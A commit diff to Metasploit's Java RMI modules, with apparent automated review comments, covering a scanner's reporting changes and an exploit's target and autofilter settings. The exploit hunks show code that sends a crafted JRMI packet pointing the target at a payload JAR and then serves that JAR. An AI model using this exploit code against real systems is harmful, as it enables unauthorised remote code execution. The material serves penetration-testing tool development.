Small updates to the rmi modules
parent
63ed7fcc8f
commit
4c2e1c2859
|
@ -48,14 +48,7 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
if res and res =~ /^\x4e..([^\x00]+)\x00\x00/
|
if res and res =~ /^\x4e..([^\x00]+)\x00\x00/
|
||||||
info = $1
|
info = $1
|
||||||
print_good("#{rhost}:#{rport} Java RMI Endpoint Detected (identified us as '#{info}')")
|
print_good("#{rhost}:#{rport} Java RMI Endpoint Detected (identified us as '#{info}')")
|
||||||
report_service(:host => rhost, :port => rport, :name => "rmi", :info => "Java RMI Endpoint (identified us as #{info})")
|
report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "Java RMI Endpoint")
|
||||||
report_vuln(
|
|
||||||
:host => rhost,
|
|
||||||
:name => self.fullname,
|
|
||||||
:port => rport,
|
|
||||||
:info => "Identified Java RMI Endpoint",
|
|
||||||
:refs => self.references
|
|
||||||
)
|
|
||||||
end
|
end
|
||||||
|
|
||||||
rescue ::Interrupt
|
rescue ::Interrupt
|
||||||
|
|
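Review bot: The match on `res` can miss a valid reply, because `.` without the `/m` flag does not match a 0x0a byte and `^` anchors at any line start rather than at the start of the buffer; if either of the two bytes after 0x4e is 0x0a, the endpoint goes unreported. For a binary response the pattern would be safer as `/\A\x4e..([^\x00]+)\x00\x00/m`. Separately, `info` is taken from the remote reply and is still interpolated into `print_good` unfiltered, so replacing non-printable bytes before display (for example `info = $1.gsub(/[^[:print:]]/, '.')`) would keep a hostile endpoint from writing control sequences to the operator's console. The enclosing method starts and ends outside the hunk.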
|
@ -79,9 +79,12 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
],
|
],
|
||||||
'DefaultTarget' => 1
|
'DefaultTarget' => 0
|
||||||
))
|
))
|
||||||
register_options( [ Opt::RPORT(1099) ], self.class)
|
register_options( [ Opt::RPORT(1099) ], self.class)
|
||||||
|
|
||||||
|
register_autofilter_ports([ 1098, 1099 ])
|
||||||
|
register_autofilter_services(%W{ rmi rmid java-rmi rmiregistry })
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
|
@ -101,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
packet[idx, find_me.length] = len + new_url
|
packet[idx, find_me.length] = len + new_url
|
||||||
|
|
||||||
# write out minimal header and packet
|
# write out minimal header and packet
|
||||||
print_status("Sending request for #{new_url}")
|
print_status("Connected and sending request for #{new_url}")
|
||||||
#sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
|
#sock.put("JRMI" + [2].pack("n") + "K" + [0].pack("n") + [0].pack("N") + packet);
|
||||||
sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet);
|
sock.put("JRMI" + [2,0x4b,0,0].pack("nCnN") + packet);
|
||||||
|
|
||||||
|
@ -130,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'Pragma' => 'no-cache'
|
'Pragma' => 'no-cache'
|
||||||
})
|
})
|
||||||
|
|
||||||
print_status("Replied to Request for Payload JAR")
|
print_status("Replied to request for payload JAR")
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
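Review bot: `%W{ rmi rmid java-rmi rmiregistry }` uses the interpolating array literal although nothing is interpolated; `register_autofilter_services(%w[rmi rmid java-rmi rmiregistry])` says the same thing without inviting accidental `#{}` expansion. The list also looks coupled to the service name the scanner in this commit now reports (`java-rmi`), so a comment such as `# names must match the :name values passed to report_service by the RMI scanners` would help keep the two in step. `'DefaultTarget' => 0` selects by index into a target list that lies outside the hunk, so I cannot confirm which entry becomes the default; it is worth naming that entry in a trailing comment.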